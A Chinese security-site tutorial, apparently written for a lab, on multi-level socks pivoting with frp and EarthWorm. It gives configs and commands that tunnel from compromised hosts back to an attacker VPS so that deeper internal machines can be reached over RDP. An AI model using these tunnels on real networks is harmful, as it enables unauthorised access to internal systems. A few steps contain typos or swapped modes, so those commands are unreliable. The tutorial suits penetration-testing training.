freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

socks代理工具
2021-05-21 17:11:13

socks代理工具

frp

ew

环境概括

网络拓扑图如下:
image

网络信息

攻击者kali

172.16.102.45

web

172.16.102.35

10.10.3.100

ziyu

10.10.3.6

10.10.5.6

hexin

10.10.5.7

192.168.72.200

hexiao

192.168.72.210

0x01 frp

下载地址

https://github.com/fatedier/frp/releases

反向代理

vps配置:

frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web配置

frpc.ini

[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

vps执行

frps.exe -c frps.ini

image

web执行

frpc.exe -c frpc.ini

image

成功运行

image

攻击机kali上配置proxychains4

vim /etc/proxychains4.conf

在注释掉socks4并添加socks5 172.16.102.40 7777

image

测试连通性

proxychains4 rdesktop 10.10.3.6

image

二级代理

vps配置

frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web配置

frpc.ini

[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.100
local_port = 7777
remote_port = 7777

frps.ini

[common]
bind_addr = 10.10.3.100
bind_port = 7000

ziyu配置

frpc.ini

[common]
server_addr = 10.10.3.100
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

vps执行

frps.exe -c frps.ini

image

web执行

frpc.exe -c frpc.ini

image

frps.exe -c frps.ini

image

ziyu执行

frpc.exe -c frpc.ini

image

成功运行

image

测试连通性

kali执行proxychains4 rdesktop 10.10.5.7

image

三级代理

vps配置

frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web配置

frpc.ini

[common]
server_addr = 172.16.102.40
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.3.100
local_port = 7777
remote_port = 7777

frps.ini

[common]
bind_addr = 10.10.3.100
bind_port = 7000

ziyu配置

frpc.ini

[common]
server_addr = 10.10.3.100
server_port = 7000
[http_proxy]
type = tcp
local_ip = 10.10.5.6
local_port = 7777
remote_port = 7777

frps.ini

[common]
bind_addr = 10.10.5.6
bind_port = 7000

hexin配置

frpc.ini

[common]
server_addr = 10.10.5.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

vps执行

rrps.exe -c frps.ini

image

web执行

frpc.exe -c frpc.ini

image

frps.exe -c frps.ini

image

ziyu执行

frpc.exe -c frpc.ini

image

frps.exe -c frps.ini

image

hexin执行

frpc.exe -c frpc.ini

image

成功运行

image

测试连通性

proxychains4 rdesktop 192.168.72.210

image

0x02 ew

下载地址

https://github.com/idlefire/ew

Earthworm提供六种链路状态,可通过

-s

参数选定,分别为

ssocksd、rcsocks、rssocks 提供socks代理服务

lcx_listen、lcx_slave、lcx_tran 提供端口转发服务

反向代理

vps执行

ew -s rcsocks -l 1080 -e 1024

vps监听1080和1024端口,等待攻击者机器访问1080端口,目标机器访问1024端口

image

web执行

ew -s rssocks -d 172.16.102.40 -e 1024

其中-d参数为vps地址

image

成功运行

image

在攻击机kali上配置proxychains4

vim /etc/proxychains4.conf

在文末注释点socks4,并添加socks5 172.16.102.40 1080

image

测试连通性

攻击机kali执行proxychains4 rdesktop 10.10.3.6

image

二级代理

vps执行

ew -s lcx_listen -l 1080 -e 1024

image

ziyu执行

ew -s ssocksd -l 9999

image

web执行

ew -s lcx_slave -d 172.16.102.40 -e 1024 -f 10.10.3.6 -g 9999

image

成功运行

image

测试连通性

攻击机kali执行proxychains4 rdesktop 10.10.5.7

image

三级代理

vps执行

ew -s rssocks -l 1080 -e 1024

image

web执行

ew -s lcx_slave -d 172.16.102.40 -e 1024 -f 10.10.3.6 -g 9999

image

ziyu执行

ew -s lcx_listen -l 9999 -e 7777

image

hexin执行

ew -s rcsocks -d 10.10.5.6 -e 7777

image

成功运行

image

测试连通性

攻击机kali执行proxychains4 rdesktop 192.168.72.210

image

# 内网穿透 # socks代理
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录